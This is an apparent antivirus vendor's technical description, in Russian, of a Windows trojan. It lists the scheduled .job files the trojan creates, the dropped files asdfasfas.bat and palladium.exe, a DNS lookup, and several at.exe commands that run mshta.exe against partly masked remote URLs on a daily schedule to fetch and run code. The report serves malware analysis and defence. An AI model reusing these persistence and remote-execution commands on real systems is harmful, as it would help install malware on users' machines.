Техническая информация
Для обеспечения автозапуска и распространения:
Создает или изменяет следующие файлы:
- %WINDIR%\Tasks\At4.job
- %WINDIR%\Tasks\At5.job
- %WINDIR%\Tasks\At6.job
- %WINDIR%\Tasks\At1.job
- %WINDIR%\Tasks\At2.job
- %WINDIR%\Tasks\At3.job
Вредоносные функции:
Запускает на исполнение:
- <SYSTEM32>\at.exe 04:35 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###umbat.com/jcfvnsdkjv.php?ca#######
- <SYSTEM32>\at.exe 03:35 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###umbat.com/jcfvnsdkjv.php?ca#######
- <SYSTEM32>\at.exe 05:35 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###umbat.com/jcfvnsdkjv.php?ca#######
- <SYSTEM32>\at.exe 07:35 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###umbat.com/jcfvnsdkjv.php?ca#######
- <SYSTEM32>\at.exe 06:35 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###umbat.com/jcfvnsdkjv.php?ca#######
- <SYSTEM32>\cmd.exe /c ""%APPDATA%\asdfasfas.bat" "
- <SYSTEM32>\mshta.exe http://re####rererere.com/inst.php?id##########
- <SYSTEM32>\at.exe 00:35 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###umbat.com/jcfvnsdkjv.php?ca#######
- <SYSTEM32>\at.exe 02:35 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###umbat.com/jcfvnsdkjv.php?ca#######
- <SYSTEM32>\at.exe 01:35 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###umbat.com/jcfvnsdkjv.php?ca#######
Изменения в файловой системе:
Создает следующие файлы:
- %APPDATA%\asdfasfas.bat
- %APPDATA%\palladium.exe
Сетевая активность:
Подключается к:
- 'localhost':1037
UDP:
- DNS ASK re####rererere.com
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: ''
